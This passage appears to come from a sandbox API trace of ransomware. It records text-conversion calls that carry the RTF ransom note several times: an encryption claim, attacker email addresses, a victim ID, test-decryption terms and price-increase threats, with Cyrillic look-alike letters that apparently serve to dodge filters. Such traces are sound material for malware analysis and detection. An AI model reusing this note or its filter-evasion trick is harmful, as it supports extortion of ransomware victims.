ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.976] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e943a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u 